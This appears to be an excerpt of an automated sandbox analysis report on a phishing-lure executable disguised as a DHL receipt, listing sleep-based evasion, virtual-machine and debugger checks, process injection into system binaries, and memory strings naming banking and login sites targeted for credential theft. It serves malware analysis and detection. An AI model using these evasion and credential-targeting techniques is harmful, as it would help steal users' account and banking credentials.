Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5528	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -239750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -239484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -239229s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -239109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -238929s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -238734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -238562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -238453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -238340s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -238234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -238124s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -238005s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -237888s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -237781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -237671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -237558s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -237453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -237343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -237222s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -237093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -236981s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -236873s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -236751s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -236625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -236503s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -236378s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -236218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -236093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -235983s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -235874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -235763s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -235656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -235526s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -235383s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -235274s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -234988s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -234841s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -234551s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 4708	Thread sleep time: -234396s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe TID: 6020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7120	Thread sleep count: 4427 > 30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7120	Thread sleep time: -8854000s >= -30000s
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7120	Thread sleep count: 5546 > 30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7120	Thread sleep time: -11092000s >= -30000s
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe TID: 1568	Thread sleep time: -65000s >= -30000s
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe TID: 1568	Thread sleep count: 32 > 30
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe TID: 1568	Thread sleep time: -48000s >= -30000s
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe TID: 1568	Thread sleep count: 31 > 30
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe TID: 1568	Thread sleep time: -31000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239890	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239773	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239656	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239535	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239414	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239297	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239187	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 239038	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238739	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238573	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238250	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238140	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 238031	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237922	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237812	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237703	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237592	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237484	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237375	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237265	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237156	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 237047	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236922	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236812	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236703	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236593	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236484	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236375	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236265	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236156	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 236047	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235922	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235812	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235692	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235562	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235452	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235343	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235232	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 235109	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234984	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234861	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234719	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234568	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234442	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 234312	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 239750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 239484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 239229	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 239109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238929	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238340	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 238005	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237888	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237558	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237222	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 237093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236981	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236873	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236751	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236503	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236378	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 236093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235983	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235763	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235526	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235383	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 235274	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 234988	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 234841	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 234551	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 234396	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: EhStorAuthn.exe, 00000011.00000002.4574054013.000000000261A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696428655j
Source: 46G3-7765.17.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,1169642
Source: 46G3-7765.17.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 46G3-7765.17.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n PasswordVMware20,11696428655x
Source: 46G3-7765.17.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l.comVMware20,11696428655h
Source: 46G3-7765.17.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pageVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: nlvpnyUnaRqfA.exe, 0000000A.00000002.2271486097.0000000001522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: firefox.exe, 00000014.00000002.2647645171.00000225236BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: blocklistVMware20,11696428655
Source: V7C903J7TTVs.exe, 00000012.00000002.4574862448.00000000014C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: 46G3-7765.17.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 46G3-7765.17.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428
Source: 46G3-7765.17.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 46G3-7765.17.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 46G3-7765.17.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 46G3-7765.17.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 46G3-7765.17.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kers.comVMware20,11696428655}
Source: 46G3-7765.17.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 46G3-7765.17.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 46G3-7765.17.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 46G3-7765.17.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 46G3-7765.17.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 46G3-7765.17.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 46G3-7765.17.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 46G3-7765.17.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,116=
Source: 46G3-7765.17.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ist test formVMware20,11696428655
Source: 46G3-7765.17.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.00000000076B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,1_
Source: 46G3-7765.17.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Code function: 0_2_016C1B30 CheckRemoteDebuggerPresent,

0_2_016C1B30

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_019D096E rdtsc

9_2_019D096E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_004179B3 LdrLoadDll,

9_2_004179B3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198A197 mov eax, dword ptr fs:[00000030h]	9_2_0198A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198A197 mov eax, dword ptr fs:[00000030h]	9_2_0198A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198A197 mov eax, dword ptr fs:[00000030h]	9_2_0198A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D0185 mov eax, dword ptr fs:[00000030h]	9_2_019D0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A34180 mov eax, dword ptr fs:[00000030h]	9_2_01A34180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A34180 mov eax, dword ptr fs:[00000030h]	9_2_01A34180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4C188 mov eax, dword ptr fs:[00000030h]	9_2_01A4C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4C188 mov eax, dword ptr fs:[00000030h]	9_2_01A4C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1019F mov eax, dword ptr fs:[00000030h]	9_2_01A1019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1019F mov eax, dword ptr fs:[00000030h]	9_2_01A1019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1019F mov eax, dword ptr fs:[00000030h]	9_2_01A1019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1019F mov eax, dword ptr fs:[00000030h]	9_2_01A1019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A661E5 mov eax, dword ptr fs:[00000030h]	9_2_01A661E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C01F8 mov eax, dword ptr fs:[00000030h]	9_2_019C01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A561C3 mov eax, dword ptr fs:[00000030h]	9_2_01A561C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A561C3 mov eax, dword ptr fs:[00000030h]	9_2_01A561C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]	9_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]	9_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E1D0 mov ecx, dword ptr fs:[00000030h]	9_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]	9_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]	9_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov eax, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov ecx, dword ptr fs:[00000030h]	9_2_01A3E10E
